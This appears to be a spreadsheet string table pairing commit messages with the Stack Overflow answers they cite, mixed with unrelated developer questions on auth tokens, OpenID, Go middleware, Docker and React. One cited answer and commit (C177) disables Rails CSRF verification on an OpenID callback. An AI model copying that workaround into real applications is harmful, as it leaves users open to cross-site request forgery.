var socket = new WebSocket('wss://example.com/channel/?ticket=d76a55...');
4. Websocket server (PHP) then validates the ticket before accepting the handshake
/**
* Receives the URL used to connect to websocket. Return true to admit user,
* false to reject the connection
*/
function acceptConnection($url){
	$params = parse_str(parse_url($url, PHP_URL_QUERY));
    return validateTicket($params['ticket']);
}
/** Returns true if ticket is valid, never-used, and not expired. */
function validateTicket($ticket){/*...*/}</t>
  </si>
  <si>
    <t xml:space="preserve">Ok, so I'm looking for a bit of architecture guidance, my team is getting a chance to re-cast certain decisions with a new feature that we're building, and I wanted to see what SO  thought :-) There are of course certain things that we're not changing, so the solution would have to fit in this model. Namely, that we've got an ASP.NET application, which uses web services to allow users to perform actions on the system.
The problem comes in because, as with many systems, different users need access to different functions.  Some roles have access to Y button, and others have access to Y and B button, while another still only has access to B.  Most of the time that I see this, developers just put in a mish-mosh of if statements to deal with the UI state.  My fear is that left unchecked, this will become an unmaintainable mess, because in addition to putting authorization logic in the GUI, it needs to be put in the web services (which are called via ajax) to ensure that only authorized users call certain methods.
so my question to you is, how can a system be designed to decrease the random ad-hoc if statements here and there that check for specific roles, which could be re-used in both GUI/webform code, and web service code.
Just for clarity, this is an ASP.NET web application, using webforms, and [external-link] for the AJAX functionality.  Don't let the script# throw  you off of answering, it's not fundamentally different than asp.net ajax :-)
</t>
  </si>
  <si>
    <t>C167</t>
  </si>
  <si>
    <t>[auth] Sets up access token expiration and use of refresh tokens for 
web &amp; native application based on recommendation found here: https://stackoverflow.com/questions/26739167/jwt-json-web-token-automatic-prolongation-of-expiration/26834685#26834685</t>
  </si>
  <si>
    <t>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t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I call:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Uri(scheme: scheme, host: '$name.blob.$suffix', path: path, queryParameters: _queryParams);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;the _queryParams contains a sas token with special characters in it, so the Uri call above will automatically encode the special chars (i.e:  &amp;amp; --&amp;gt; %26  )and so it  fails when trying to upload a blob to azure.&lt;/p&gt;
&lt;p&gt;Is there a way to turn off that encoding?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C168</t>
  </si>
  <si>
    <t>Switch to JSON web tokens for oauth.
For rationale, see this thread:
    http://stackoverflow.com/a/28551319/1505451</t>
  </si>
  <si>
    <t>It turns out I'm using the wrong OAuth flow if I want to do this. Thanks to Euca for the inspiration to figure this out.
At the time I asked the question, I was assuming there were multiple projects involved in the Google Developers Console:
One project for me, the developer, that contained generated credentials for an "installed application", with the client ID and (supposed) secret baked into my source code.
One project for each of my users, owning and being billed for a bucket that they were using the application to access.
Instead of using "installed application" credentials, what I did was switch to "service account" credentials, generated by the user in the project that owns their bucket. That allows them to create and download a JSON key file that they can feed to my application, which then uses the JSON Web Tokens flow of OAuth 2.0 (aka "two-legged OAuth") to obtain authorization. The benefits of this are:
There is no longer a need for me to have my own project, which was a weird wart in the process.
By default, the service account credentials allow my application to access only the buckets owned by the project for which they were generated. If the user has other projects with other buckets, the app cannot access them.
But, the service account has an "email address" just like any other user, and can be added to the ACLs for any bucket regardless of project, granting access to that bucket.</t>
  </si>
  <si>
    <t xml:space="preserve">I have an application that is made up of the following:
A central database containing 100k+ records
A number of "client" databases each containing around 10-20k records
The client databases contain details of contacts that each have a unique ID (contactID).
The central database contains some of these contacts identified by the same contactID.
Overnight we need to iterate through the client databases querying the central database for updates to each contact then bring it into the client database. 
The central database is held by a third party so we cannot change anything. 
The company holding the central database want to do this over web services iterating through each contact. 
My concerns are this would be very slow to do over web services given the number of records. 
Currently I am thinking of generating a file on each client which contains a list of all the contacts for that client. This would then be sent to the central database. The central database would then process this file and send back another file containing all updates. 
How would you create this so it runs as quick as possible?
</t>
  </si>
  <si>
    <t>C169</t>
  </si>
  <si>
    <t>Extends lifespan of tokens issued with the implicit grant type.
I intend to use implicit grants for auth on the web app.
This is based on an opinion by an auth0 dev: https://stackoverflow.com/questions/26739167/jwt-json-web-token-automatic-prolongation-of-expiration/26834685#26834685</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a Jenkins container that creates the other containers when the build is done, but my React container, it initializes correctly, but when I try to access it, it breaks the project saying the React library Icons of the import, but locally it works.&lt;/p&gt;
&lt;p&gt;I know that the configuration may be correct because my API container in Node is working fine.&lt;/p&gt;
&lt;p&gt;I'll leave the Dockerfile and docker-compose, Jenkinsfile.&lt;/p&gt;
&lt;p&gt;&lt;a href="https://i.sstatic.net/E4KS79iZ.png" rel="nofollow noreferrer"&gt;&lt;img src="https://i.sstatic.net/E4KS79iZ.png" alt="enter image description here" /&gt;&lt;/a&gt;&lt;/p&gt;
&lt;h1&gt;Jenkinsfile&lt;/h1&gt;
&lt;pre&gt;&lt;code&gt;pipeline {
    agent any
    environment {
        IMAGE_NAME = &amp;quot;devops-web-api&amp;quot;
        CONTAINER_NAME = &amp;quot;web-app&amp;quot;
        COMPOSE_FILE = &amp;quot;docker-compose.yml&amp;quot;
    }
    stages {
        stage('Clonar repositÃ³rio') {
            steps {
                git branch: 'main', url: 'https://github.com/vagnerwentz/WebAgronomia.git'
            }
        }
        stage('Subir Containers com Docker Compose') {
            steps {
                sh 'docker compose down -v'  // Remove containers antigos e volumes
                sh 'docker compose up -d --build'  // Builda e sobe os containers
            }
        }
        stage('Verificar Containers') {
            steps {
                sh 'docker ps'
            }
        }
    }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;h1&gt;Dockerfile&lt;/h1&gt;
&lt;pre&gt;&lt;code&gt;FROM node:latest
WORKDIR /app
COPY package*.json .
COPY tsconfig*.json .
RUN npm install
COPY . .
EXPOSE 5001
CMD [&amp;quot;npm&amp;quot;, &amp;quot;start&amp;quot;, &amp;quot;--&amp;quot;, &amp;quot;--port&amp;quot;, &amp;quot;5001&amp;quot;]
&lt;/code&gt;&lt;/pre&gt;
&lt;h1&gt;docker-compose.yml&lt;/h1&gt;
&lt;pre&gt;&lt;code&gt;services:
  web_agronomia:
    build:
      context: .
      dockerfile: Dockerfile
    container_name: web-agronomia
    ports:
      - &amp;quot;5001:5001&amp;quot;
    environment:
      - PORT=5001
    networks:
      - app-network
networks:
  app-network:
    driver: bridge
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>C17</t>
  </si>
  <si>
    <t>Created &amp; Implemented Annotation Dialog, Made DiologPopup Into Class 
Component, ...
--- Changelog ---
Core:
- Cleaned handleSelect Function
- Created &amp; Implemented NoteContainer for text annotations
- Moved color mapping list to a constant
- Added checkmark and trash svg's for NoteContainer
- Removed border around highlight bubbles
- Extracted old popup position code to calculateBoxPosition, so calculation code could be reuused for the annotation popup
- Recreated DialogPopup.
This was done because done because it was a Functional Component.
It was recreated into a class component due to problems with stale state.
See:
https://stackoverflow.com/questions/55154186/react-hooks-usestateuseeffectevent-gives-stale-state#comment97090822_55156813</t>
  </si>
  <si>
    <t>value is stale in the event handler because it gets its value from the closure where it was defined. Unless we re-subscribe a new event handler every time value changes, it will not get the new value.
Solution 1: Make the second argument to the publish effect [value] . This makes the event handler get the correct value, but also causes the effect to run again on every keystroke.
Solution 2: Use a ref to store the latest value in a component instance variable. Then, make an effect which does nothing but update this variable every time
value state changes. In the event handler, use the ref, not value.
const [value, setValue] = useState(initialValue);
const refValue = useRef(value);
useEffect(() =&gt; {
    refValue.current = value;
});
const handleEvent = (msg, data) =&gt; {
    console.info("Value in event handler: ", refValue.current);
};
https://reactjs.org/docs/hooks-faq.html#what-can-i-do-if-my-effect-dependencies-change-too-often
Looks like there are some other solutions on that page which might work too. Much thanks to @Dinesh for the assistance.</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I would like to automatically, not hard code increment numbers on certain steps using PlantUML.&lt;/p&gt;
&lt;p&gt;I have the following code:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;group Step: incrementOnlyLeftToRight
    autonumber
    Left -&amp;gt; Right ++: needToIncrementAuto
    Right --&amp;gt; Left : noNeed
    Left -&amp;gt; Right ++: needToIncrementAutoAgain
    Right --&amp;gt; Left : noNeedAgain
end
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Where you can see I am using the &lt;code&gt;autonumber&lt;/code&gt; construct.&lt;/p&gt;
&lt;p&gt;This, unfortunately, increases the number for everything (please see screenshot)&lt;/p&gt;
&lt;p&gt;&lt;a href="https://i.sstatic.net/kEqKo4hb.png" rel="nofollow noreferrer"&gt;&lt;img src="https://i.sstatic.net/kEqKo4hb.png" alt="enter image description here" /&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;How to tell autonumber to increment only for when Left goes to Right, but not the opposite?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C170</t>
  </si>
  <si>
    <t>Use Flask-Security to generate JWT like tokens.
Some good reading is available at:
- http://pythonhosted.org/Flask-Security/
- https://pythonhosted.org/Flask-JWT/
- https://auth0.com/blog/2014/01/07/angularjs-authentication-with-cookies-vs-token/
- https://auth0.com/blog/2015/03/10/blacklist-json-web-token-api-keys/
- http://librelist.com/browser/flask/2012/3/1/is-it-wise-for-flask-to-store-session-variables-on-the-client/
- http://pythonhosted.org/Flask-KVSession/
- http://stackoverflow.com/questions/21978658/invalidating-json-web-tokens</t>
  </si>
  <si>
    <t>I too have been researching this question, and while none of the ideas below are complete solutions, they might help others rule out ideas, or provide further ones.
1) Simply remove the token from the client
Obviously this does nothing for server side security, but it does stop an attacker by removing the token from existence (ie. they would have to have stolen the token prior to logout).
2) Create a token blocklist
You could store the invalid tokens until their initial expiry date, and compare them against incoming requests. This seems to negate the reason for going fully token based in the first place though, as you would need to touch the database for every request. The storage size would likely be lower though, as you would only need to store tokens that were between logout &amp; expiry time (this is a gut feeling, and is definitely dependent on context).
3) Just keep token expiry times short and rotate them often
If you keep the token expiry times at short enough intervals, and have the running client keep track and request updates when necessary, number 1 would effectively work as a complete logout system. The problem with this method, is that it makes it impossible to keep the user logged in between closes of the client code (depending on how long you make the expiry interval).
Contingency Plans
If there ever was an emergency, or a user token was compromised, one thing you could do is allow the user to change an underlying user lookup ID with their login credentials. This would render all associated tokens invalid, as the associated user would no longer be able to be found.
I also wanted to note that it is a good idea to include the last login date with the token, so that you are able to enforce a relogin after some distant period of time.
In terms of similarities/differences with regards to attacks using tokens, this post addresses the question:
https://github.com/dentarg/auth0-blog/blob/master/_posts/2014-01-07-angularjs-authentication-with-cookies-vs-token.markdown</t>
  </si>
  <si>
    <t xml:space="preserve">Using a web service is often an excellent architectural approach. And, with the advent of WCF in .Net, it's getting even better.
But, in my experience, some people seem to think that web services should always be used in the data access layer for calls to the database. I don't think that web services are the universal solution.
I am thinking of smaller intranet applications with a few dozen users. The web app and its web service are deployed to one web server, not a web farm. There isn't going to be another web app in the future that can use this particular web service. It seems to me that the cost of calling the web service unnecessarily increases the burden on the web server. There is a performance hit to inter-process calls. Maintaining and debugging the code for the web app and the web service is more complicated. So is deployment. I just don't see the advantages of using a web service here.
One could test this by creating two versions of the web app, with and without the web service, and do stress testing, but I haven't done it.
Do you have an opinion on using web services for small-scale web app's? Any other occasions when web services are not a good architectural choice?
</t>
  </si>
  <si>
    <t>C171</t>
  </si>
  <si>
    <t>add new openid server
https://pip.verisignlabs.com/faq.do#faq17
http://stackoverflow.com/questions/466608/</t>
  </si>
  <si>
    <t>try this, it should work ;)
&lt;link rel="openid.server" href="http://pip.verisignlabs.com/server" /&gt;
&lt;link rel="openid.delegate" href="http://gubbi.pip.verisignlabs.com" /&gt;
&lt;link rel="openid2.provider" href="http://pip.verisignlabs.com/server" /&gt;
&lt;link rel="openid2.local_id" href="http://gubbi.pip.verisignlabs.com" /&gt;
&lt;meta http-equiv="X-XRDS-Location" content="http://pip.verisignlabs.com/user/gubbi/yadisxrds" /&gt;
&lt;meta http-equiv="X-YADIS-Location" content="http://pip.verisignlabs.com/user/gubbi/yadisxrds" /&gt;
no need to do anything fancy ;)</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I use a global map in Drools to store lookup values â€‹â€‹to check against.
The map is Java defined as:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Map&amp;lt;String,Set&amp;lt;String&amp;gt;&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;and is passed to the engine as global, so that the rule (shortened to the essentials) looks like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;import java.util.Set;
global java.util.Map lookupValues;
dialect &amp;quot;java&amp;quot;
rule &amp;quot;rule&amp;quot;
agenda-group &amp;quot;SYSTEM&amp;quot;
when
$lookup : Set() from lookupValues[&amp;quot;KEY&amp;quot;]
//Alternative
//$lookup : Set() from lookupValues.get(&amp;quot;KEY&amp;quot;)
then
System.out.println(&amp;quot;fail&amp;quot;)
end
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I want to use $lookup as a Set so that I can later check against other values â€‹â€‹using contains. But declaring it as a Set prevents the RHS part from being executed.&lt;/p&gt;
&lt;p&gt;When i access die lookupValues in this way:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;import java.util.*;
global java.util.Map lookupValues;
dialect &amp;quot;java&amp;quot;
rule &amp;quot;rule&amp;quot;
agenda-group &amp;quot;SYSTEM&amp;quot;
when
$rawLookup : Object() from lookupValues.get(&amp;quot;KEY&amp;quot;)
then
   Set values = (Set)lookupValues.get(&amp;quot;KEY&amp;quot;);
   System.out.println(&amp;quot;Value: &amp;quot; + values+&amp;quot;, &amp;quot;+values.getClass());
end
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;prints:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Value: [id3, id2, id1], class java.util.HashSet
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;as i expected.
So, the definition of the lookup variable or the global is probably wrong.
Any ideas?
Thanks in advance.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C172</t>
  </si>
  <si>
    <t>Review Authentication code based on:
https://stackoverflow.com/questions/34058960/owin-openid-connect-authorization-fails-to-authorize-secured-controller-action</t>
  </si>
  <si>
    <t>TL;DR: use ResponseType = "id_token token" and it should work.
In OpenID Connect, response_type=token is not considered as a legal value: http://openid.net/specs/openid-connect-core-1_0.html#Authentication.
Sometimes implemented for backward compatibility reasons, response_type=token is not supported by the OIDC middleware developed by MSFT: an exception is always thrown when no id_token is returned by the OpenID Connect provider (which also excludes the valid code flow). You can find more information on this other SO post.
(remark: in SecurityTokenValidated, you're replacing the ticket created by the OIDC middleware using n.AuthenticationTicket = new AuthenticationTicket(...): it's not the recommended approach and will result in a ClaimsIdentity missing the essential claims. You should consider removing the assignation and simply add new claims like you do for the access_token claim)</t>
  </si>
  <si>
    <t xml:space="preserve">I am looking for some architectual design patterns for enterprise application development. I am aware of the all of the GoF patterns, and MVC, and such things, but I am looking for patterns that emerge at a larger scope. In particular I have a somewhat larger enterprise desktop and website application, they share certain functionality, and some is unique, and I am looking for best practices on how to structure the entire solution, how to expose business logic domains to others via factories, or such, and generally things of this nature that deal with the entire application as a whole.
</t>
  </si>
  <si>
    <t>C173</t>
  </si>
  <si>
    <t>Trust Google and Yahoo to return valid email addresses
Both Google and Yahoo guarantee that the email address they return
during the OpenID authentication are emails that they have already
verified:
  http://stackoverflow.com/q/5639419
Therefore special case these OpenID providers and automatically
activate the new users account without requiring a separate email
verification step.
This therefore reduces the signup procedure by one step and makes
it easier for new users of these OpenID providers, which cover the
majority of users.</t>
  </si>
  <si>
    <t>Yes, in both cases the email addresses corresopnde to the verified addresses by Yahoo and Google. Here are the sources confirming it.
http://developer.yahoo.com/blogs/ydn/posts/2009/12/yahoo_openid_now_with_attribute_exchange/
http://code.google.com/apis/accounts/docs/OpenID.html</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a table named &lt;code&gt;Expenses&lt;/code&gt; and the table has a column named &lt;code&gt;expenseEditHistory&lt;/code&gt;. The column is of &lt;strong&gt;JSONB&lt;/strong&gt; type. I am using &lt;code&gt;sequelize&lt;/code&gt; to manage the database (postgres).&lt;/p&gt;
&lt;p&gt;Structure for &lt;code&gt;expenseEditHistory&lt;/code&gt; column is&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;{
    last_updated_by: {user-id},
    history: [
        {
          desccription: {description-text},
          time: {time}
        }
    ]
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I need to update multiple expense based on the expense IDs. I can do almost it using the sequelize's &lt;code&gt;update&lt;/code&gt; method. Currently I am using the following codes.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;await Expenses.update(
    {
        isDeleted: true,
        expenseEditHistory: {
            last_updated_by: req.user.id,
            history: sequelize.fn(
                'array_append',
                sequelize.col('expenseEditHistory.history'),
                editHistoryItem
            ),
        },
    },
    {
        where: {
            id: {
                [Op.in]: expenseIDXasTableID,
            },
        },
    }
);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;code&gt;expenseEditHistory&lt;/code&gt; column isn't being updated as per my expectation. I want to push another item in the &lt;code&gt;expenseEditHistory.history&lt;/code&gt; array.&lt;/p&gt;
&lt;p&gt;How can I achieve it?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C174</t>
  </si>
  <si>
    <t>Removed Google openid auth and replaced with Google oath2 authenticat
ion. Had to be done since Google just deprecated openid, preventing the creation of new clients as of May: http://stackoverflow.com/questions/23773275/changed-domain-error-openid-auth-request-contains-an-unregistered-domain</t>
  </si>
  <si>
    <t>According to this page, Google closed registration to new OpenID 2.0 clients in May 2014 and will be shutting down the OpenID 2.0 service in April 2015.
The reason why some hosts work and some don't is that although Google isn't adding new hosts, you can still use the ones that are already registered.
UPDATE : Some people have asked for a simple explanation for how to fix this, or otherwise how to proceed.
Basically, you now have 2 options.
Use OAuth 2.0 (instead of openID protocols and older versions of OAuth)
or
Use Google+ login (which Google tried to "push" you towards)
For more details check the migration guide :
https://developers.google.com/+/api/auth-migration#userinfo</t>
  </si>
  <si>
    <t xml:space="preserve">We are designing a Payroll Generation System for a client.
The organization we are targeting has a hierarchy as follows:
Company -&gt; Cluster -&gt; Business Unit (BU) -&gt; Department -&gt; Employee
The salary for an employee is made up of various salary components.
Each salary component has 3 rules associated with it, a Calculation Rule (Calculate component as % of another component, or % of a fixed number or a fixed number), an Eligibility Rule (whether an Employee/Dept is eligible for a component) and a Constraint Rule which limits tha max and min of a component.
****These rules are editable and can be edited by a user end user**. Also these rules are inherited top-down, but if defined at a lower level, the lower level rule takes precedence.**
We have a database which has Attendance, Leaves, Bonuses tables and these rules are also supposed to interact with these tables.
The client will be generating payroll for multiple clients each hosting a Separate Database instance. They may each have a different interpretation of each component and may have different components.
We are only looking to support SQL Server, and payroll generation will be an offline activity.
We are divided upon where to put the logic which uses these rules to generate the individual tax components (which will include Tax Deductions, Tax Write-offs, Allowances, etc).
Some people are advocating magic SPs which will take an employee Id and generate a payroll for that month.
Others want the logic to be split into separate components which will get the dependent data for an employee in the application layer and calculate these components there.
The order of our priorities are:
1. The ability to adapt changes to new clients quickly
2. Long term maintainability
3. Performance
1 and 2 outweigh 3 here by a large factor as this will be an offline activity.
Maintainability and Quick Customizability are very important, we will be deploying the application for different clients.
Client A may have a Salary Component Rule as ((0.3 * Basic) + 800)
and Client B as (0.2 * Basic) + (0.1 * Atendance Bonus)
Will SPs cause a mess here, as the rules suggested above will be specified by the end user and will need to be customizable through a web UI.
We will have to parse the formulas from SQL. How difficult or easy will it be?
What advantage will doing this in the Application Layer (C# .Net) have over using SPs?
The original post is here:
[external-link]
...but none of the questions were properly answered.
Suggestions and pointers to existing systems' architecture will be very helpful.
...and yes, we are using LINQ to SQL elsewhere in the system.
Kind regards,
Ashish Sharma
</t>
  </si>
  <si>
    <t>C175</t>
  </si>
  <si>
    <t>Change code according to below SO answer.
https://stackoverflow.com/questions/33661935/owin-middleware-for-openid-connect-code-flow-flow-type-authorizationcode</t>
  </si>
  <si>
    <t>Edit: good news, code flow and response_mode=query support was finally added to Katana, as part of the 4.1 release (that shipped in November 2019): https://github.com/aspnet/AspNetKatana/wiki/Roadmap#410-release-november-2019.
Be sure to set the RedeemCode property to true if you want it to handle the communication with the token endpoint.
The OpenID Connect middleware doesn't support the code flow: http://katanaproject.codeplex.com/workitem/247 (it's already fixed in the ASP.NET 5 version, though).
Actually, only the implicit flow (id_token) is officially supported, and you have to use the response_mode=form_post extension. Trying to use the authorization code flow will simply result in an exception being thrown during the callback, because it won't be able to extract the (missing) id_token from the authentication response.
Though not directly supported, you can also use the hybrid flow (code + id_token (+ token)), but it's up to you to implement the token request part. You can see https://github.com/aspnet-contrib/AspNet.Security.OpenIdConnect.Server/blob/dev/samples/Nancy/Nancy.Client/Startup.cs#L82-L115 for an example.</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;In cell A5, I am trying to reference the 1st 3 numbers of a cell A1 to &lt;code&gt;vlookup&lt;/code&gt; a value in a table in columns C:D.  When I run the code separately, it works great.  Once the &lt;code&gt;vlookup&lt;/code&gt; and the left functions are combined, I get &amp;quot;#N/A&amp;quot; error.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;A1=123-123456
C1=123
D1=30
=vlookup(left(A1,3),C:D,2,0)
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>C176</t>
  </si>
  <si>
    <t>Removed OpenID 2.0 delegation links because it's no longer supported 
by Google and delegation like that isn't part of the latest OpenID standards.
See http://stackoverflow.com/a/28054173 for details.</t>
  </si>
  <si>
    <t>OpenID Connect only supports Discovery that is meant to find your Provider based on some hint you give it (e-mail, account, URL, domain etc.); it won't give you a persistent identifier for which you can delegate authentication to a configurable Provider of your choice.
So if you only want to use a custom URI to find your provider, you can use the approach that Nat gave (except for the last bit that Google does not and can not do and assuming that SO supports Discovery).
But if you want true delegation, so that RPs can use an identifier returned by the OP that is persistent over different OPs that you delegate to, then you can't.
For StackOverflow you probably don't need either one of those: SO uses its own primary identifier/account and you can link several accounts to that, including Google's. Only if SO would have used your custom URI as its primary identifier you would have had a problem. In this case there's no problem and you can:
use the Google login button, or
type your custom URI in the OpenID URL entry box, assuming both you and have implemented Discovery
But both 1. and 2. really yield the same result: they find out that Google is where you want to authenticate.</t>
  </si>
  <si>
    <t xml:space="preserve">I sometimes have difficulties with other people who wish to solve a problem when they wish to skip the official interfaces and access underlying implementation details directly.
They argue that doing so will allow them to solve the problem more quickly.  I argue that doing so will cause our architecture to become more tightly coupled and difficult to change as new requirements emerge.
I point out all of the work that went into the current design and the philosophy of the design and the value of flexibility, the cost of trying to maintain and change brittle code, the value of encapsulation and data hiding and layered architectures and being robust so that small changes in the specification lead to small changes in the code.  And they say "But this would be easier."
How do you handle these people?
</t>
  </si>
  <si>
    <t>C177</t>
  </si>
  <si>
    <t>Primarily fixed issue with session erasing after auth from Google.
Protect from forgery screws this up.  See
http://stackoverflow.com/questions/5049994/omniauth-current-session-not-loaded-on-openid-callback-Got ca-bundle.crt from http://certifie.com/ca-bundle/ca-bundle.crt.txt</t>
  </si>
  <si>
    <t>Confirming Andrei Serdeliuc's solution, disabling protect_from_forgery worked for me (Ruby 1.8.7, Rails 2.3.11, OmniAuth 0.1.6)
in your CallbackController (AuthenticationsController in the famous screencast) adding  skip_before_filter :verify_authenticity_token  or  protect_from_forgery :except =&gt; :create at the top of the controller work !
As it could be a way for CSRF (Cross-Site Request Forgery) you should verify the identity of the openid server, don't forget to setup the certificate verification (in the initializer):
it will prevent warnings like :
Now my sessions are not reseted anymore, and can add several openid authentication to my curren_user.
cheers</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am working on a React Native project using &lt;strong&gt;React Native 0.77.1&lt;/strong&gt; and trying to use the camera in my app. I have installed react-native-camera (version 4.2.1) and set up permissions correctly, but I am facing issues when trying to open the camera.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Problem:&lt;/strong&gt;&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;The camera opens but immediately closes.&lt;/li&gt;
&lt;li&gt;I get the error: &amp;quot;Attempt to invoke virtual method 'module.getEventDispatcher' on a   null object reference&amp;quot;&lt;/li&gt;
&lt;li&gt;Sometimes, the camera just shows a loading indicator and does not open properly.&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;My Setup:&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;package.json&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&amp;quot;dependencies&amp;quot;: {
&amp;quot;react&amp;quot;: &amp;quot;18.3.1&amp;quot;,
&amp;quot;react-native&amp;quot;: &amp;quot;0.77.1&amp;quot;,
&amp;quot;react-native-camera&amp;quot;: &amp;quot;^4.2.1&amp;quot;,
&amp;quot;react-native-permissions&amp;quot;: &amp;quot;^5.2.5&amp;quot;,
&amp;quot;react-native-qrcode-scanner&amp;quot;: &amp;quot;^1.5.5&amp;quot;
}&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Android Permissions (AndroidManifest.xml)&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Camera Component Code (CameraScreen.tsx)&lt;/strong&gt;&lt;/p&gt;
&lt;pre&gt;&lt;code&gt; import React, { useState, useRef, useEffect } from 'react';
   import { View, Alert, Button, Platform } from 'react-native';
   import { RNCamera } from 'react-native-camera';
   import { request, PERMISSIONS, RESULTS } from 'react-native-permissions';
     const CameraScreen = () =&amp;gt; {
       const [hasPermission, setHasPermission] = useState&amp;lt;boolean | null&amp;gt;(null);
       const cameraRef = useRef&amp;lt;RNCamera&amp;gt;(null);
       useEffect(() =&amp;gt; {
         const requestCameraPermission = async () =&amp;gt; {
         const permission =
           Platform.OS === 'android'
            ? PERMISSIONS.ANDROID.CAMERA
            : PERMISSIONS.IOS.CAMERA;
         const result = await request(permission);
         setHasPermission(result === RESULTS.GRANTED);
       };
       requestCameraPermission();
     }, []);
     return (
       &amp;lt;View style={{ flex: 1 }}&amp;gt;
         {hasPermission ? (
           &amp;lt;RNCamera
            ref={cameraRef}
            style={{ flex: 1 }}
            type={RNCamera.Constants.Type.back}
            onCameraReady={() =&amp;gt; console.log('Camera is ready')}
            captureAudio={false}
          /&amp;gt;
        ) : (
          &amp;lt;Button title=&amp;quot;Request Camera Permission&amp;quot; onPress={() =&amp;gt;        requestCameraPermission()} /&amp;gt;
         )}
       &amp;lt;/View&amp;gt;
     );
   };
export default CameraScreen;
&lt;/code&gt;&lt;/pre&gt;
&lt;ul&gt;
&lt;li&gt;Verified permissions (react-native-permissions returns GRANTED).&lt;/li&gt;
&lt;li&gt;Ensured that the app has minSdkVersion 21 in android/build.gradle.&lt;/li&gt;
&lt;li&gt;Manually linked react-native-camera using react-native link react-native-camera.&lt;/li&gt;
&lt;li&gt;Cleaned and rebuilt the project using ./gradlew clean &amp;amp;&amp;amp; react-native run-android.&lt;/li&gt;
&lt;li&gt;Tried upgrading react-native-camera to the latest version.&lt;/li&gt;
&lt;li&gt;Considered switching to react-native-vision-camera&lt;/li&gt;
&lt;/ul&gt;
</t>
  </si>
  <si>
    <t>C178</t>
  </si>
  <si>
    <t>Implement Protecting Endpoints (authorization)
We had three endpoints that we want to be protected. This means that the user must be authorized before they can run those functions.
We simply had to add middleware to them
More resources on middleware in GO
https://stackoverflow.com/questions/41272169/using-middleware-with-golang-gorilla-mux-subrouters
https://stackoverflow.com/questions/64768950/how-to-use-specific-middleware-for-specific-routes-in-a-get-subrouter-in-gorilla</t>
  </si>
  <si>
    <t>I have a specific requirement with Gorilla mux routing where i want to add different Middlewares for different routes that are under one subrouter( GET subrouter in my case). Below is my code for routing:
```
    // create a serve mux
	sm := mux.NewRouter()
	// register handlers
	postR := sm.Methods(http.MethodPost).Subrouter()
	postR.HandleFunc("/signup", uh.Signup)
	postR.HandleFunc("/login", uh.Login)
	postR.Use(uh.MiddlewareValidateUser)
	getR := sm.Methods(http.MethodGet).Subrouter()
	getR.HandleFunc("/refresh-token", uh.RefreshToken)
	getR.HandleFunc("/user-profile", uh.GetUserProfile)
```
In the above router logic both my /refresh-token and /user-profile token come under getR router. Also i have two middleware functions called ValidateAccessToken and ValidateRefreshToken. I want to use the ValidateRefreshToken middleware function for "/refresh-token" route and ValidateAccessToken for all other routes under GET subrouter. I want to do it with Gorilla mux routing itself. Please suggest me the appropriate approach to accomplish the above scenario. Thanks for your time and effort.
I had a similar use case and this is an example of how I solved it:
package main
import (
	"log"
	"net/http"
	"time"
)
import (
	"github.com/gorilla/mux"
)
// Adapter is an alias so I dont have to type so much.
type Adapter func(http.Handler) http.Handler
// Adapt takes Handler funcs and chains them to the main handler.
func Adapt(handler http.Handler, adapters ...Adapter) http.Handler {
	// The loop is reversed so the adapters/middleware gets executed in the same
	// order as provided in the array.
	for i := len(adapters); i &gt; 0; i-- {
		handler = adapters[i-1](handler)
	}
	return handler
}
// RefreshToken is the main handler.
func RefreshToken(res http.ResponseWriter, req *http.Request) {
	res.Write([]byte("hello world"))
}
// ValidateRefreshToken is the middleware.
func ValidateRefreshToken(hKey string) Adapter {
	return func(next http.Handler) http.Handler {
		return http.HandlerFunc(func(res http.ResponseWriter, req *http.Request) {
			// Check if a header key exists and has a value
			if value := req.Header.Get(hKey); value == "" {
				res.WriteHeader(http.StatusForbidden)
				res.Write([]byte("invalid request token"))
				return
			}
			// Serve the next handler
			next.ServeHTTP(res, req)
		})
	}
}
// MethodLogger logs the method of the request.
func MethodLogger() Adapter {
	return func(next http.Handler) http.Handler {
		return http.HandlerFunc(func(res http.ResponseWriter, req *http.Request) {
			log.Printf("method=%s uri=%s\n", req.Method, req.RequestURI)
			next.ServeHTTP(res, req)
		})
	}
}
func main() {
	sm := mux.NewRouter()
	getR := sm.Methods(http.MethodGet).Subrouter()
